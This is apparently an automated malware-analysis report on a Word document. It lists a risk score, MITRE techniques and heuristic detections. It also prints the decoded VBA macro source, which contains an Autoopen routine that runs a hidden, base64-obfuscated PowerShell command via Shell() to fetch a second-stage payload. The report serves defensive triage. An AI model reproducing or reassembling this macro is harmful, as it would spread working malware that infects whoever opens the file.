MALICIOUS
Risk Score: 182
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains a VBA macro with an Autoopen subroutine that calls a function which in turn uses the Shell() function. This function constructs and executes a PowerShell command. The PowerShell command is obfuscated but appears to be designed to download and execute a second-stage payload. The use of Autoopen and Shell() indicates a malicious intent to execute arbitrary code upon opening the document.
Heuristics (6)
- VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA (critical) OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro (high) OLE_VBA_AUTOOPEN: AutoOpen macro
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18637 bytes |

SHA-256: 5daeec45791edff9fb8e44efea8b7ea78fc7551516a248e2d67867bc69d20f6e

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "BkkzktwQH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function dUYaVD()
On Error Resume Next
sJbvl = qRqznZ - Cos(vLzCcS) * 1 - Chr(79431) / 61424 - ChrB(rQVlLp)
fOWHdw = 53330
vjVbz = cjbnY - Cos(djEpi) * 1 - Chr(69519) / 17915 - ChrB(LZARB)
KjQSNw = 69346
dUYaVD = jTILLaactor + EjLVlPWOJZ + dOFTGjh + HfEJHsKQb + fYBHmAwwPu + NTcRszjrwao + iDQNo + IYFKA + MusZRB + IOKdBJ + LqjJsfMzJ + zWsAjvYWudf
GtzOiR = juwnb - Cos(zKjct) * 1 - Chr(75207) / 18029 - ChrB(VjEZQH)
SIZZdq = 49737
End Function
Sub Autoopen()
On Error Resume Next
sQBsD = fCdZaL - Cos(kqULa) * 1 - Chr(75804) / 70884 - ChrB(soSJW)
lYNzQ = 48905
tXwzXZBuRd (dUYaVD)
nLrvGV = jazpwT - Cos(SFNDCp) * 1 - Chr(1935) / 99318 - ChrB(jijQud)
cJlZw = 58162
End Sub
Function tXwzXZBuRd(lvQzZzF)
On Error Resume Next
QUSudS = cMCfTT - Cos(uOkwo) * 1 - Chr(69393) / 16157 - ChrB(ZFwCK)
jKumo = 55133
ikuXjm = WikaK - Cos(hvBbH) * 1 - Chr(88768) / 38748 - ChrB(uMwaI)
wBItf = 82201
cifmcBpJT = Shell(KkXtdJoa + Chr(vbKeyP) + qTXqSWawaj + lvQzZzF, vbHide)
LdqaH = BqvUVs - Cos(pkJSit) * 1 - Chr(16391) / 85698 - ChrB(XvzYVK)
VrvTM = 42085
End Function

Attribute VB_Name = "LAAwSOzsd"
Function jTILLaactor()
On Error Resume Next
KoqjF = dtWvOq - Cos(LkTJf) * 1 - Chr(71452) / 34324 - ChrB(KiBDV)
Pulua = 62265
PbqUNJXYkR = "owersHeLL -Win" + "DowsTyle h" + "idden -e S" + "QBOAHYAbw"
MrSSi = sqDslI - Cos(kKCKhc) * 1 - Chr(13805) / 8997 - ChrB(GpdjhO)
kAoJBz = 86141
BnvBC = "BLAGUALQ" + "BFAFgAcABSA" + "EUAUwBTAGkA" + "TwBuACgAIAAoACg"
qAFZU = qPufW - Cos(sbNzZ) * 1 - Chr(16496) / 25084 - ChrB(cpuzdq)
rzwok = 34306
RufotokrV = "AIgB7A" + "DgANgB9" + "AHsAN" + "gAzAH0"
ThWhj = QZjEKJ - Cos(Jnqks) * 1 - Chr(73678) / 15026 - ChrB(BFIvd)
wSwqmn = 82442
wCQXCFkJv = "AewA3ADAAfQB7AD" + "YANwB9AHsAMwAwA" + "H0AewAxADM" + "AfQB7" + "ADQAOAB9AH" + "sANQAzAH0Aew" + "AzADYAfQB7ADUAM" + "AB9AHsAO" + "AAyAH0AewAxADgA" + "fQB7AD"
jarYV = DGqmU - Cos(IDGNww) * 1 - Chr(19286) / 55981 - ChrB(bOmGC)
HnNYW = 32393
sWbFsq = "kAMgB9AHs" + "AOAAxAH0AewAxA" + "DIANAB9AH" + "sANgB9AHsANwAx" + "AH0AewAyADkAfQ" + "B7ADEAMQAzAH" + "0AewAxADAA"
HQtUR = VvPVau - Cos(uMiund) * 1 - Chr(26468) / 79078 - ChrB(MFSTD)
TcNwSG = 93875
IzjLjTUmjOV = "OAB9AHsAMQAwA" + "DMAfQB7ADIAfQB" + "7ADMANQ" + "B9AHs" + "AMQAxADgAf" + "QB7ADgAMwB9AHs" + "AMgA2AH0AewAxAH"
UchXIX = sLLUW - Cos(ETlsDM) * 1 - Chr(4977) / 8348 - ChrB(BzjZcm)
ccawW = 26109
wXYzzT = "0AewAxA" + "DEAMAB" + "9AHsAMQA1ADAAfQ" + "B7ADQANAB9A" + "HsAMQA0A" + "DkAfQ" + "B7ADEAMAA2" + "AH0AewA" + "xADYAMgB"
FGFSs = uGwhB - Cos(IcFPt) * 1 - Chr(88905) / 72023 - ChrB(ajniua)
ijuYXr = 2575
zXvXMiwfSKk = "9AHsAMQ" + "A2ADMAfQB7ADEA" + "NAA4AH0AewAzAH" + "0AewAyADA" + "AfQB7ADEA" + "MgA3AH0AewAxA" + "DQANAB9AH"
jTILLaactor = PbqUNJXYkR + BnvBC + RufotokrV + wCQXCFkJv + sWbFsq + IzjLjTUmjOV + wXYzzT + zXvXMiwfSKk
End Function
Function EjLVlPWOJZ()
On Error Resume Next
mzuKlt = zBXNdf - Cos(MhDlj) * 1 - Chr(84302) / 43030 - ChrB(WXRiL)
EJdXH = 94031
iUqfhUZE = "sANgAxAH0AewA" + "0ADEAf" + "QB7AD" + "gANQB9AHsANwA" + "1AH0A" + "ewAxADMAMQB" + "9AHsAOAAwAH0Aew" + "AzADMAfQB7" + "ADYAMAB9AHsA"
RwjAn = jmKhwE - Cos(WMUmK) * 1 - Chr(18272) / 17480 - ChrB(aXsCh)
vsuqV = 66885
wHHiiChPU = "MQAwADQAfQB7AD" + "UANQB9AHsA" + "MQA2ADcA" + "fQB7ADEA" + "NQAxAH0AewAxA" + "DYANgB" + "9AHsAMQA2A" + "DUAfQB"
uiUks = mfLqV - Cos(zArpqM) * 1 - Chr(96384) / 76557 - ChrB(raqwFI)
uQqaWI = 53868
dMDGUk = "7ADkANQB9AH" + "sAMQAwADEAfQB" + "7ADQAMgB9" + "AHsAOAA3AH0Ae" + "wAxADQAMA" + "B9AHs" + "ANQAyAH0AewAxA" + "DUAfQB7ADEA" + "NAA1AH" + "0AewAxADMAM"
zBRzWp = hXYiW - Cos(CDiXu) * 1 - Chr(12311) / 6891 - ChrB(dmnDw)
vzuHrY = 25854
Jjwio = "gB9AHsA" + "MQAwA" + "DUAfQB7ADIAMQB9" + "AHsANgAy" + "AH0Ae" + "wAxAD" + "UAOAB9AHsA"
puARIc = TZXlkr - Cos(MDbBY) * 1 - Chr(41650) / 43507 - ChrB(itYDT)
cRrwqN = ... (truncated)
```